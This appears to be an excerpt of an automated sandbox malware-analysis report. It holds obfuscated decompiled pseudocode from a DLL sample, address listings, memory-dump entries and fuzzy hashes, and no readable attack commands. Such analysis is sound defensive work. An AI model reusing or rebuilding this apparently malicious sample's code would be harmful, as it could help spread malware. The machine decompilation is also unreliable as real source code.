						_t692 =  *((intOrPtr*)(_t748 + 0x50));
						_t404 =  *0x6d55d570; // 0x0
						 *(_t748 + 0x14) = 0x1684;
						if( *((intOrPtr*)(_t404 +  *0x1680 * 4)) != ( *(_t692 + 0x19aa) & 0x0000ffff) || ( *0x6d55d5d0 & 0x0000ffff) >  *(_t748 + 0x3c)) {
							_t572 =  *0x6d55d5ac; // 0x0
							_t405 =  *0x6d55d5cc; // 0x0
							 *((intOrPtr*)(_t544 + _t572 * 4)) =  *((intOrPtr*)(_t544 + _t572 * 4)) + _t405;
							 *0x6d55d5cc =  *0x6d55d5cc - 1;
							_t406 =  *0x6d55d5d4; // 0x0
							 *(_t748 + 0x3c) =  *((intOrPtr*)( *((intOrPtr*)(_t748 + 0x4c)) + _t406 * 8)) + _t406;
							 *0x6d55d5d4 = _t406 + 1;
							_t409 =  *0x6d55d5e0; // 0x0
							_t575 =  *0x6d55d57c; // 0x0
							_t411 =  *0x6d55d570; // 0x0
							 *0x6d55d57c = _t575 + 1;
							_t577 =  *0x6d55d5ac; // 0x0
							_t578 = _t577 + 1;
							 *0x6d55d5ac = _t578;
							_push( *( *(_t748 + 0x10) + 0x78 +  *(_t748 + 0x58) * 4) | 0x0000067d);
							_push( *0x49f5);
							_push(_t578);
							_push( *((intOrPtr*)( *(_t748 + 0x38) + ( *0x6d55d5c0 & 0x0000ffff) * 4)) + 0x1427);
							_push( *((intOrPtr*)(_t411 + 0x6f24)) - 0x12c);
							_push( *( *((intOrPtr*)(_t748 + 0x54)) + 0xa + _t409 * 2) & 0x0000ffff &  *( *((intOrPtr*)(_t748 + 0x50)) + _t575 * 8) & 0x0000ffff);
							_push( *(_t692 + 0x50 +  *_t710 * 2) & 0x0000ffff);
							_push( *(_t748 + 0x3c));
							_t416 = E6D5147B8();
							_t579 =  *(_t748 + 0x30);
							_t748 = _t748 + 0x20;
							_t544 =  *((intOrPtr*)(_t748 + 0x48));
							 *((intOrPtr*)( *(_t748 + 0x28) +  *_t579 * 0xc)) = _t416;
							goto L10;
						} else {
							goto L11;
						}
					}
					goto L3;
				} else {
					L3:
					_t675 =  *0x6d55d5b0; // 0x0
					_t707 = _t544 + _t733 * 4;
					_t498 =  *0x6d55d5c4; // 0x0
					_t676 = _t675 - 1;
					_t622 =  *0x6d55d5ac; // 0x0
					_t499 = _t498 + 1;
					 *0x6d55d5c4 = _t499;
					_t623 = _t622 + 1;
					 *0x6d55d5ac = _t623;
					 *0x6d55d5b0 = _t676;
					 *_t707 = (_t499 & 0x0000ffff & _t676 | _t623) -  *_t707;
					_t624 =  *0x6d55d5ac; // 0x0
					 *(_t748 + 0x2c) = _t707;
					_t692 =  *((intOrPtr*)(_t748 + 0x50));
					_t625 = _t624 - 1;
					 *0x6d55d574 = ( *(_t692 + _t624 * 2) & 0x0000ffff) - 0x1d69;
					_t506 =  *0x6d55d580; // 0x0
					_t507 = _t506 + 1;
					 *0x6d55d5ac = _t625;
					 *0x6d55d580 = _t507;
					 *((intOrPtr*)( *(_t748 + 0x1c) + 0x14 + _t507 * 4)) = _t625 -  *((intOrPtr*)( *(_t748 + 0x1c) + 0x14 + _t507 * 4));
					_t728 =  &(_t710[1]);
					 *(_t748 + 0x10) = _t728;
					if( *((intOrPtr*)(_t544 + 0x4c + ( *_t710 +  *_t710) * 8)) > _t733) {
						L5:
						if( *((intOrPtr*)(_t692 +  *_t728 * 2)) != 0xf3f) {
							L11:
							 *0x6d55d578 =  *0x6d55d578 + 0xf8;
							_t713 =  *0x6d55d5d4; // 0x0
							_t714 = _t713 + 1;
							 *0x6d55d5d4 = _t714;
							_t193 = _t714 + 1; // 0x2
							asm("cdq");
							_t739 =  *(_t748 + 0x58);
							 *(_t748 + 0x2c) = (( *(_t692 +  *(_t748 + 0x18) * 2) & 0x0000ffff) +  *((intOrPtr*)( *((intOrPtr*)(_t748 + 0x4c)) + 0x26d0))) /  *( *((intOrPtr*)(_t748 + 0x4c)) + (_t193 + _t193) * 8) -  *(_t748 + 0x40) & 0x0000ffff;
							_t715 =  *( *((intOrPtr*)(_t748 + 0x54)) + _t714 * 2) & 0x0000ffff;
							_t423 =  *0x6d55d57c; // 0x0
							if(_t715 > _t423) {
								L18:
								_t695 =  *(_t748 + 0x30);
								 *0x6d55d57c = _t423 + 1;
								_t716 =  *(_t695 +  *(_t748 + 0x18) * 2) & 0x0000ffff;
								if(_t716 !=  *((intOrPtr*)( *0x6d55d578 * 0xc + _t544))) {
									L21:
									_t428 =  *0x6d55d5e0; // 0x0
									 *0x6d55d5e0 = _t428 + 1;
									_push( *0x6d55d5b4);
									asm("cdq");
									_t741 =  *(_t748 + 0x5c);
									_push(( *0x6d55d5d0 & 0x0000ffff) +  *0x6d55d5d4);
									_push(_t741);
									_push(0x6b9 /  *( *((intOrPtr*)(_t748 + 0x4c)) +  *( *(_t748 + 0x14)) * 4));
									_push( *( *((intOrPtr*)(_t748 + 0x50)) +  *( *(_t748 + 0x10)) * 2) & 0x0000ffff);
									_push( *(_t748 + 0x64) & 0x0000ffff);
									_push(_t428);
									_push(0x1772 - ( *0x6d55d5c4 & 0x0000ffff));
									_t435 = E6D5147B8();
									_t658 =  *(_t748 + 0x34);
									_t749 = _t748 + 0x20;
									_t697 =  *(_t749 + 0x48);
									 *(_t749 + 0x14) =  &(_t658[1]);
									 *((intOrPtr*)(_t697 +  *_t658 * 4)) = _t435;
									 *( *((intOrPtr*)(_t749 + 0x30)) +  *( *(_t749 + 0x10)) * 2) = ( *( *((intOrPtr*)(_t749 + 0x30)) +  *( *(_t749 + 0x10)) * 2) & 0x0000ffff) * ( *0x6d55d598 & 0x0000ffff);
									_t718 =  *0x6d55d598; // 0x0
									_t441 =  *0x6d55d5c8; // 0x0
									 *0x6d55d574 = ( *0x6d55d588 & 0x0000ffff ^  *(_t697 + (_t718 + _t718) * 8)) %  *0x6d55d574;
									_t549 =  *(_t441 + _t718 * 4);
									_t442 =  *0x6d55d594; // 0x0
									 *(_t749 + 0x28) = _t549;
									if(_t549 >=  *((intOrPtr*)(_t442 + 0x84 +  *(_t749 + 0x18) * 4))) {
										L24:
										return 0x1c03;
									}
									 *(_t749 + 0x48) = _t697 + (_t741 + 1) * 4;
									_t721 =  &(( &(( *(_t749 + 0x4c))[4]))[_t549]);
									 *(_t749 + 0x28) = _t549 * 6 +  *((intOrPtr*)(_t749 + 0x54));
									_t446 = 0x2c;
									 *(_t749 + 0x4c) = _t721;
									 *((intOrPtr*)(_t749 + 0x40)) = _t446 - _t697;
									do {
										_t448 =  *0x6d55d5b4; // 0x0
										_t449 = _t448 + 1;
										 *0x6d55d5b4 = _t449;
										 *0x6d55d5e0 =  *0x6d55d5e0 + (_t449 & _t741);
										_push(_t549);
										_push(0x12e9);
										_push( *( *((intOrPtr*)(_t749 + 0x54)) + 0x30 +  *( *(_t749 + 0x14)) * 2) & 0x0000ffff);
										_push(0x503);
										_push(0);
										_push(_t549);
										_push( *(_t749 + 0x64) & 0x0000ffff);
										_t455 = E6D5061B5();
										_t550 =  *0x6d55d58c; // 0x0
										 *0x6d55d5b4 = _t455;
										_t722 =  *(_t749 + 0x74);
										_t551 = _t550 - 1;
										 *0x6d55d58c = _t551;
										_push(_t551);
										_t552 =  *(_t749 + 0x48);
										 *((intOrPtr*)(_t749 + 0x78)) = _t722 - 1;
										_t725 =  *((intOrPtr*)(_t749 + 0x68)) - 4;
										_t460 =  *0x6d55d5a8; // 0x0
										 *((intOrPtr*)(_t749 + 0x68)) = _t725;
										_push(_t552);
										_push( *( *(_t749 + 0x48)) & 0x0000ffff ^  *0x6d55d58a & 0x000000ff);
										_push( *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x60)) + _t725 + _t460)));
										_push( *( *((intOrPtr*)(_t749 + 0x30)) +  *(_t749 + 0x48) * 4) *  *(_t749 + 0x48));
										_push(_t551 % ( *( *((intOrPtr*)(_t749 + 0x6c)) + _t722 * 2) & 0x0000ffff));
										_push(0);
										_push( *_t721 & 0x00001857);
										_t463 = E6D5147B8();
										_t665 =  *((intOrPtr*)(_t749 + 0x8c));
										_t749 = _t749 + 0x3c;
										 *0x6d55d5ac = _t463;
										_t721 =  &(( *(_t749 + 0x4c))[1]);
										_t464 =  *0x6d55d598; // 0x0
										 *(_t749 + 0x4c) = _t721;
										 *( *(_t749 + 0x48)) =  *( *(_t749 + 0x48)) & ( *(_t665 + 0xa + _t464 * 2) & 0x0000ffff) +  *0x6d55d5dc;
										 *0x6d55d598 =  *0x6d55d598 - 1;
										_t467 =  *0x6d55d58a; // 0x0
										_t468 = _t467 + 1;
										_t666 =  *(_t749 + 0x34);
										 *0x6d55d58a = _t468;
										 *(_t666 +  *( *(_t749 + 0x10)) * 8) =  *(_t666 +  *( *(_t749 + 0x10)) * 8) | _t468 & 0x000000ff;
										_t549 = _t552 + 1;
										 *((intOrPtr*)(_t749 + 0x24)) =  *((intOrPtr*)(_t749 + 0x24)) + 6;
										 *(_t749 + 0x28) = _t549;
										_t470 =  *0x6d55d594; // 0x0
										_t741 =  *(_t749 + 0x58);
									} while (_t549 <  *((intOrPtr*)(_t470 + 0x84 + _t666 * 4)));
									goto L24;
								}
								_t744 =  *((intOrPtr*)(_t748 + 0x54));
								do {
									asm("cdq");
									 *0x6d55d5c4 = ( *(_t744 + 0x1dae) & 0x0000ffff) * 0x1b62;
									_push(0xa64 % _t716);
									_push( *0x6d55d5e0 & 0x0000ffff);
									_push(0x1486);
									_push(0x447);
									_push( *(_t748 + 0x34) & 0x0000ffff);
									_push(_t716);
									_push( *(_t748 + 0x68) & 0x0000ffff);
									 *((short*)(_t695 + _t716 * 2)) = E6D5061B5();
									_t748 = _t748 + 0x1c;
									_t716 = _t716 + 1;
								} while (_t716 ==  *((intOrPtr*)( *0x6d55d578 * 0xc + _t544)));
								goto L21;
							}
							_t668 = _t544 + _t715 * 4;
							 *(_t748 + 0x28) = _t668;
							_t617 = (_t715 << 4) +  *(_t748 + 0x1c);
							 *(_t748 + 0x24) = _t617;
							 *(_t748 + 0x20) =  *(_t748 + 0x34) + _t739 * 2 + 0xe;
							 *(_t748 + 0x40) =  *((intOrPtr*)(_t748 + 0x54)) - _t544;
							_t705 =  *((intOrPtr*)(_t748 + 0x50));
							do {
								_t745 =  *(_t748 + 0x5c);
								 *0x6d55d57c = _t423 + 1;
								_t618 = _t745;
								 *((short*)( *((intOrPtr*)(_t748 + 0x54)) + _t715 * 2)) =  *_t617;
								 *( *(_t748 + 0x1c) + (_t618 & 0x0000ffff) * 4) =  *( *(_t748 + 0x1c) + (_t745 & 0x0000ffff) * 4) * _t715;
								_t619 =  *(_t748 + 0x24);
								_t544 =  *((intOrPtr*)(_t748 + 0x48));
								 *_t668 = _t618 & 0x0000ffff;
								_t484 =  *0x6d55d5cc; // 0x0
								 *0x6d55d588 =  *0x6d55d588 + _t484;
								_t758 =  *0x6d55d5d4 - _t715; // 0x0
								if(_t758 <= 0) {
									_t705 =  *((intOrPtr*)(_t748 + 0x50));
									if( *( *(_t748 + 0x20)) > 0x12b5) {
										 *0x6d55d59c =  *0x6d55d59c ^ 0x00001f1e;
										asm("cdq");
										_t621 =  *(_t748 + 0x28);
										 *0x6d55d5c4 = _t715 % ( *0x6d55d5c4 & 0x0000ffff);
										 *(_t748 + 0x20) =  *(_t748 + 0x20) + 2;
										 *_t621 =  *_t621 & 0x00000000;
										_t489 =  *0x6d55d580; // 0x0
										 *(_t748 + 0x58) =  *(_t748 + 0x58) + 1;
										 *_t621 = _t489 %  *(_t544 + 0x1e24) + _t715;
										_t619 =  *(_t748 + 0x24);
										 *0x6d55d5e4 = ( *( *((intOrPtr*)(_t748 + 0x4c)) + 0x7798) ^  *0x6d55d5b0) %  *0x6d55d5e4;
										_t668 =  *(_t748 + 0x28);
									}
								} else {
									 *(_t668 +  *(_t748 + 0x40)) =  *(_t668 +  *(_t748 + 0x40)) ^ 0x0000120f;
									_t496 =  *0x6d55d598; // 0x0
									 *(_t705 + _t496 * 2) =  *(_t705 + _t496 * 2) & 0x00000991;
									_t544 =  *((intOrPtr*)(_t748 + 0x48));
								}
								_t423 =  *0x6d55d57c; // 0x0
								_t715 = _t715 + 1;
								_t617 = _t619 + 0x10;
								_t668 =  &(_t668[1]);
								 *(_t748 + 0x24) = _t617;
								 *(_t748 + 0x28) = _t668;
							} while (_t715 <= _t423);
							goto L18;
						}
						L6:
						_t511 =  *0x6d55d598; // 0x0
						_t729 =  *(_t748 + 0x5c);
						 *((intOrPtr*)(_t544 + _t511 * 4)) = 0x50a;
						_t512 =  *0x6d55d5d4; // 0x0
						_t513 =  *0x6d55d5e4; // 0x0
						 *(_t748 + 0x3c) =  *( *((intOrPtr*)(_t748 + 0x4c)) + _t512 * 4) | _t513;
						 *0x6d55d5e4 = _t513 - 1;
						 *(_t748 + 0x5c) = 0x725;
						 *(_t748 + 0x38) =  *(_t733 * 6 + _t692 + 2) & 0x0000ffff |  *0x6d55d598;
						 *(_t748 + 0x20) = ( *(_t748 + 0x5c) & 0x0000ffff) /  *( *(_t748 + 0x2c));
						_t520 =  *0x6d55d5dc; // 0x0
						_t634 =  *0x6d55d5bc; // 0x0
						 *(_t748 + 0x24) = _t520 / 0x1349;
						 *(_t748 + 0x2c) =  *0x6d55d5d8 * 0x1eff;
						_t523 =  *0x6d55d58c; // 0x0
						_t635 =  *0x6d55d574; // 0x0
						asm("cdq");
						_t730 = _t729 + 1;
						_push(( *(_t748 + 0x28))[_t729 & 0x0000ffff] %  *(_t748 + 0x5c));
						 *(_t748 + 0x74) = _t730;
						_t529 = E6D51755D( *((intOrPtr*)(_t748 + 0x60)),  *(_t748 + 0x58),  *(_t748 + 0x3c),  *(_t748 + 0x3c),  *(_t748 + 0x40), _t523 /  *0x6d55d580,  *(_t634 +  *(_t748 + 0x58) * 4) & 0x00001ec5,  *((intOrPtr*)(_t634 + 0x80 +  *(_t748 + 0x58) * 4)), _t635 ^  *0x6d55d58c);
						_t686 =  *(_t748 + 0x38);
						_t748 = _t748 + 0x28;
						_t544 =  *((intOrPtr*)(_t748 + 0x48));
						 *0x6d55d5d8 = _t529;
						_t530 =  *0x6d55d58a; // 0x0
						_t531 = _t530 - 1;
						 *0x6d55d58a = _t531;
						 *(_t748 + 0x10) =  &(_t686[1]);
						 *((intOrPtr*)(_t544 + 0x4c +  *_t686 * 4)) =  *((intOrPtr*)(_t544 + 0x4c +  *_t686 * 4)) + (_t531 & 0x000000ff) + 0x699;
						_t731 =  *((intOrPtr*)(_t748 + 0x4c));
						asm("cdq");
						 *(_t731 + (_t730 & 0x0000ffff) * 8) = (( *( *((intOrPtr*)(_t748 + 0x54)) + 0x1580) & 0x0000ffff) + 0x1b1b) %  *(_t731 + (_t730 & 0x0000ffff) * 8);
						_t539 =  *0x6d55d57c; // 0x0
						asm("cdq");
						asm("cdq");
						 *(_t731 + ( *(_t748 + 0x58) + 2 +  *(_t748 + 0x58) + 2) * 8) = _t539 /  *0x6d55d5ac /  *(_t731 + ( *(_t748 + 0x58) + 2 +  *(_t748 + 0x58) + 2) * 8);
						L10:
						_t692 =  *((intOrPtr*)(_t748 + 0x50));
						goto L11;
					}
					_t542 =  *0x6d55d5b4; // 0x0
					_t754 = _t542 -  *0x6d55d578; // 0x0
					if(_t754 > 0) {
						goto L6;
					}
					goto L5;
				}
			}












































































































            0x6d5169e5
            0x6d5169ed
            0x6d5169f6
            0x6d5169fb
            0x6d5169fc
            0x6d516a01
            0x6d516a15
            0x6d516a2b
            0x6d516a2f
            0x6d516a33
            0x6d516a3b
            0x6d516a41
            0x6d516a45
            0x6d516a47
            0x6d516a4e
            0x6d516a59
            0x6d516a5d
            0x6d516a6c
            0x6d516a70
            0x6d516a71
            0x6d516a77
            0x6d516a7b
            0x6d516a9d
            0x6d516aa3
            0x6d516aa7
            0x6d516aae
            0x6d516ab3
            0x6d516ab6
            0x6d516aba
            0x6d516ac3
            0x6d516ac7
            0x6d516acc
            0x6d516ae0
            0x6d516ae3
            0x6d516ae5
            0x6d516aea
            0x6d516af0
            0x6d516b0a
            0x6d516d01
            0x6d516d0a
            0x6d516d0f
            0x6d516d23
            0x6d516d36
            0x6d516d3c
            0x6d516d45
            0x6d516d48
            0x6d516d4e
            0x6d516d61
            0x6d516d65
            0x6d516d75
            0x6d516d7f
            0x6d516d8f
            0x6d516d95
            0x6d516d9b
            0x6d516dc1
            0x6d516dc2
            0x6d516dd5
            0x6d516dd6
            0x6d516ddc
            0x6d516ddd
            0x6d516dde
            0x6d516ddf
            0x6d516de0
            0x6d516de1
            0x6d516de2
            0x6d516de7
            0x6d516deb
            0x6d516df2
            0x6d516df9
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d516d23
            0x00000000
            0x6d516b10
            0x6d516b10
            0x6d516b10
            0x6d516b16
            0x6d516b19
            0x6d516b1f
            0x6d516b20
            0x6d516b26
            0x6d516b28
            0x6d516b2e
            0x6d516b34
            0x6d516b3c
            0x6d516b48
            0x6d516b4a
            0x6d516b50
            0x6d516b54
            0x6d516b61
            0x6d516b62
            0x6d516b67
            0x6d516b6c
            0x6d516b6d
            0x6d516b73
            0x6d516b7c
            0x6d516b82
            0x6d516b87
            0x6d516b8f
            0x6d516b9e
            0x6d516ba9
            0x6d516e00
            0x6d516e00
            0x6d516e0a
            0x6d516e14
            0x6d516e1d
            0x6d516e2d
            0x6d516e32
            0x6d516e37
            0x6d516e46
            0x6d516e4a
            0x6d516e4e
            0x6d516e55
            0x6d516f8e
            0x6d516f8e
            0x6d516f93
            0x6d516f9c
            0x6d516faa
            0x6d51700b
            0x6d51701d
            0x6d51702d
            0x6d517038
            0x6d517049
            0x6d51705b
            0x6d51705f
            0x6d517064
            0x6d517065
            0x6d517066
            0x6d51706a
            0x6d51706b
            0x6d51706c
            0x6d51706d
            0x6d517072
            0x6d517076
            0x6d517079
            0x6d517086
            0x6d51708a
            0x6d5170a1
            0x6d5170a7
            0x6d5170c1
            0x6d5170ca
            0x6d5170d0
            0x6d5170d3
            0x6d5170d8
            0x6d5170e3
            0x6d517245
            0x6d51724e
            0x6d51724e
            0x6d5170f9
            0x6d517103
            0x6d517106
            0x6d51710a
            0x6d51710d
            0x6d517111
            0x6d517115
            0x6d517115
            0x6d51711e
            0x6d51711f
            0x6d517126
            0x6d517130
            0x6d517131
            0x6d517141
            0x6d517142
            0x6d517147
            0x6d51714c
            0x6d51714d
            0x6d51714e
            0x6d517153
            0x6d51715b
            0x6d517162
            0x6d517170
            0x6d517171
            0x6d517177
            0x6d517189
            0x6d51718d
            0x6d517198
            0x6d51719b
            0x6d5171a9
            0x6d5171ad
            0x6d5171c1
            0x6d5171c2
            0x6d5171c3
            0x6d5171c4
            0x6d5171c5
            0x6d5171c7
            0x6d5171c8
            0x6d5171cd
            0x6d5171d4
            0x6d5171df
            0x6d5171e4
            0x6d5171e7
            0x6d5171ec
            0x6d5171fb
            0x6d5171fd
            0x6d517203
            0x6d51720c
            0x6d51720e
            0x6d517212
            0x6d51721c
            0x6d517220
            0x6d517221
            0x6d517226
            0x6d51722a
            0x6d517231
            0x6d517235
            0x00000000
            0x6d517115
            0x6d516fac
            0x6d516fb0
            0x6d516fc4
            0x6d516fc7
            0x6d516fd5
            0x6d516fd6
            0x6d516fdb
            0x6d516fe7
            0x6d516fec
            0x6d516ff0
            0x6d516ff1
            0x6d516ff7
            0x6d516ffb
            0x6d517005
            0x6d517006
            0x00000000
            0x6d516fb0
            0x6d516e5f
            0x6d516e64
            0x6d516e6b
            0x6d516e72
            0x6d516e79
            0x6d516e83
            0x6d516e87
            0x6d516e8b
            0x6d516e90
            0x6d516e94
            0x6d516e9c
            0x6d516e9e
            0x6d516eb2
            0x6d516eb7
            0x6d516ebe
            0x6d516ec2
            0x6d516ec4
            0x6d516eca
            0x6d516ed1
            0x6d516ed7
            0x6d516f06
            0x6d516f0a
            0x6d516f18
            0x6d516f21
            0x6d516f24
            0x6d516f28
            0x6d516f31
            0x6d516f36
            0x6d516f39
            0x6d516f48
            0x6d516f4e
            0x6d516f52
            0x6d516f68
            0x6d516f6e
            0x6d516f6e
            0x6d516ed9
            0x6d516ee2
            0x6d516eeb
            0x6d516ef0
            0x6d516ef4
            0x6d516ef4
            0x6d516f72
            0x6d516f77
            0x6d516f78
            0x6d516f7b
            0x6d516f7e
            0x6d516f82
            0x6d516f86
            0x00000000
            0x6d516e8b
            0x6d516baf
            0x6d516baf
            0x6d516bba
            0x6d516bbe
            0x6d516bc5
            0x6d516bcd
            0x6d516bd5
            0x6d516bdd
            0x6d516be5
            0x6d516bf8
            0x6d516c0c
            0x6d516c10
            0x6d516c19
            0x6d516c1f
            0x6d516c2d
            0x6d516c31
            0x6d516c59
            0x6d516c68
            0x6d516c6d
            0x6d516c6e
            0x6d516c77
            0x6d516c8b
            0x6d516c90
            0x6d516c94
            0x6d516c97
            0x6d516c9b
            0x6d516ca0
            0x6d516ca5
            0x6d516ca7
            0x6d516cb9
            0x6d516cbd
            0x6d516cc4
            0x6d516cdb
            0x6d516cde
            0x6d516ce4
            0x6d516cec
            0x6d516cf5
            0x6d516cf9
            0x6d516dfc
            0x6d516dfc
            0x00000000
            0x6d516dfc
            0x6d516b91
            0x6d516b96
            0x6d516b9c
            0x00000000
            0x00000000
            0x00000000
            0x6d516b9c

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ca4d8173ee75e7154eb051e302a31911b52c2221cccfc35c0db9e48ae809487c
            • Instruction ID: 6831073a72cdfb54eeb63fb0fec34d30a96a907b4523f69795bc3e0711e5e5e3
            • Opcode Fuzzy Hash: ca4d8173ee75e7154eb051e302a31911b52c2221cccfc35c0db9e48ae809487c
            • Instruction Fuzzy Hash: 7B4224766083108FDB1ADF19C480A2ABBF1FBCA348F12492EF98687751D7B5A851CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D519823 Relevance: .3, Instructions: 317COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 84%
            			E6D519823() {
				signed int _t221;
				signed int _t222;
				signed short _t224;
				intOrPtr _t235;
				signed int _t254;
				void* _t264;
				signed int _t274;
				signed int _t275;
				intOrPtr _t297;
				signed int _t301;
				intOrPtr _t302;
				intOrPtr _t315;
				intOrPtr _t325;
				intOrPtr _t332;
				signed int _t335;
				signed int _t336;
				signed char _t339;
				signed int _t341;
				signed int _t345;
				signed int _t347;
				intOrPtr _t350;
				signed int* _t353;
				intOrPtr _t358;
				signed int* _t367;
				signed int _t372;
				signed int _t375;
				signed int _t376;
				signed int _t382;
				signed short _t384;
				intOrPtr _t385;
				signed int* _t386;
				signed char _t394;
				signed char _t395;
				signed int _t415;
				signed int _t418;
				intOrPtr _t420;
				signed int _t422;
				intOrPtr _t424;
				signed int _t425;
				signed int _t430;
				signed int _t433;
				void* _t434;
				void* _t435;
				void* _t437;
				void* _t445;

				_t221 =  *0x6d55d57c; // 0x0
				_t222 = _t221 - 1;
				 *0x6d55d57c = _t222;
				 *(_t434 + 0x14) =  *( *((intOrPtr*)(_t434 + 0x48)) + _t222 * 2) & 0x0000ffff;
				_t224 =  *0x6d55d5c4; // 0x0
				 *0x6d55d5c4 = _t224 + 0xffff;
				_t422 =  *(_t434 + 0x4c) & 0x000000ff;
				 *(_t434 + 0x30) = _t224 & 0x0000ffff;
				_t345 =  *0x6d55d5e0; // 0x0
				 *(_t434 + 0x38) = ( *( *((intOrPtr*)(_t434 + 0x3c)) + _t422 * 4) & 0x000000ff) * _t345;
				asm("cdq");
				 *0x6d55d588 =  *0x6d55d588 + 0xffff;
				_t335 =  *(_t434 + 0x44);
				 *(_t434 + 0x28) = ( *( *((intOrPtr*)(_t434 + 0x5c)) + 0x1de2) & 0x000000ff) %  *( *((intOrPtr*)(_t434 + 0x40)) + _t422 * 4);
				_t430 = 0xc01 / _t335;
				 *0x6d55d5e0 = _t345 - 1;
				 *(_t434 + 0x18) =  *0x6d55d59c & 0x0000ffff;
				_t235 =  *0x6d55d5d8; // 0x0
				_t415 =  *( *((intOrPtr*)(_t434 + 0x20)) + _t422 * 4);
				 *(_t434 + 0x24) = _t430;
				 *(_t434 + 0x10) = _t235 + _t335;
				 *(_t434 + 0x14) = _t415;
				_t435 = _t415 -  *0x6d55d5b0; // 0x0
				if(_t435 == 0) {
					L4:
					_t347 =  *0x6d55d5c0 & 0x0000ffff;
					_t336 =  *(_t434 + 0x34) & 0x0000ffff;
					if(_t336 >=  *((intOrPtr*)(_t430 + _t347 * 4))) {
						L19:
						asm("cdq");
						 *(0xa72 +  *0x177e * 4) = ( *(_t434 + 0x50) + 0x00000001 & 0x000000ff) %  *( *((intOrPtr*)(_t434 + 0x40)) + 0x6230);
						_t382 = ( *0x6d55d59c & 0x0000ffff) -  *0x6d55d5ac;
						_t350 =  *0x6d55d570; // 0x0
						 *0x6d55d5ac = _t382;
						return  *( *(_t434 + 0x34) + 0x3d50) & 0x0000ffff |  *(_t350 + _t382 * 4);
					}
					_t424 =  *((intOrPtr*)(_t434 + 0x54));
					 *(_t434 + 0x1c) = _t336 + _t336;
					do {
						asm("cdq");
						asm("cdq");
						_t384 = (_t336 / 0x00001222 | _t336) % _t347;
						 *0x6d55d5c0 = _t384;
						 *((short*)(_t424 + (_t384 & 0x0000ffff) * 2)) = (_t336 & 0x0000ffff) * (_t336 & 0x0000ffff) -  *((intOrPtr*)(_t424 + (_t384 & 0x0000ffff) * 2));
						_t254 =  *0x6d55d5d4; // 0x0
						 *(_t430 + _t254 * 4) =  *(_t430 + _t254 * 4) ^ _t336;
						 *0x6d55d5d4 =  *0x6d55d5d4 + 1;
						_t385 =  *0x6d55d5a8; // 0x0
						_t418 =  *( *(_t434 + 0x28) +  *( *(_t434 + 0x18)) * 2) & 0x0000ffff;
						if(_t418 >  *((intOrPtr*)(_t385 + 0x297c))) {
							goto L18;
						}
						_t353 = 0x177e;
						 *(_t434 + 0x38) = (_t336 & 0x000000ff) * 0x000000ce | _t336;
						 *(_t434 + 0x18) = _t418 * 4 + _t430;
						 *(_t434 + 0x34) = 0x177e - _t430;
						_t264 = 0x20;
						 *((intOrPtr*)(_t434 + 0x2c)) = _t264 - _t430;
						while(1) {
							_t386 =  *(_t434 + 0x10);
							_t386[ *( *(_t434 + 0x10))] =  *(_t385 +  *_t353 * 4);
							 *(_t434 + 0x10) = _t386 - 4;
							 *0x177e =  *0x177e - 1;
							asm("cdq");
							_t358 =  *0x6d55d594; // 0x0
							 *0x6d55d5b8 =  *0x6d55d5b8 ^  *(_t434 + 0x1c) / ( *(_t424 +  *0x177e * 2) & 0x0000ffff) ^  *(_t424 + 0x2d6c) & 0x0000ffff;
							 *0x6d55d58a =  *(_t434 + 0x34);
							_t274 =  *0x6d55d578; // 0x0
							_t275 =  *0x6d55d5e0; // 0x0
							if(( *(_t424 + _t274 * 2) & 0x0000ffff) <  *((intOrPtr*)(_t358 + _t275 * 8)) || ( *( *0x177e +  *((intOrPtr*)(_t434 + 0x48))) & 0x000000ff) >= _t418) {
								goto L24;
							}
							L11:
							_t394 =  *(_t434 + 0x50);
							_t425 = _t394 & 0x000000ff;
							 *0x6d55d5d0 =  *0x6d55d5d0 + 0xffff;
							_t430 =  *(_t434 + 0x24);
							if( *((intOrPtr*)( *((intOrPtr*)(_t434 + 0x20)) + _t425 * 4)) == ( *0x6d55d5d0 & 0x0000ffff) ||  *((intOrPtr*)( *(_t434 + 0x30) +  *(_t434 + 0x14))) >=  *((intOrPtr*)(0xa72 + _t425 * 4))) {
								 *((char*)(_t425 +  *((intOrPtr*)(_t434 + 0x5c)))) = (_t336 |  *0x6d55d5a0) -  *((intOrPtr*)(_t425 +  *((intOrPtr*)(_t434 + 0x5c))));
							} else {
								if( *0x6d55d5dc <= 0xa5b) {
									L20:
									if( *(_t434 + 0x38) >= _t336) {
										 *0x177e =  *0x177e + 1;
										if(( *( *((intOrPtr*)(_t434 + 0x58)) +  *0x177e * 2) & 0x0000ffff) <= _t418) {
											_t395 = _t394 - 1;
											 *(_t434 + 0x50) = _t395;
											_t297 =  *0x6d55d5dc; // 0x0
											_t367 =  *(_t434 + 0x14);
											 *( *((intOrPtr*)(_t434 + 0x40)) + (_t395 & 0x000000ff) * 4) = (_t297 + 0x16e9) % ( *( *((intOrPtr*)(_t434 + 0x54)) + (_t395 & 0x000000ff) * 2) & 0x0000ffff) *  *_t367;
											_t301 =  *0x6d55d578; // 0x0
											 *0x6d55d5a0 = _t301;
											_t302 =  *0x6d55d5c8; // 0x0
											asm("cdq");
											 *0x6d55d5ac =  *(_t367 +  *((intOrPtr*)(_t434 + 0x2c)) + _t302) / _t336;
										}
									}
									L16:
									_t424 =  *((intOrPtr*)(_t434 + 0x54));
									L17:
									_t385 =  *0x6d55d5a8; // 0x0
									_t418 = _t418 + 1;
									 *(_t434 + 0x14) =  *(_t434 + 0x14) + 4;
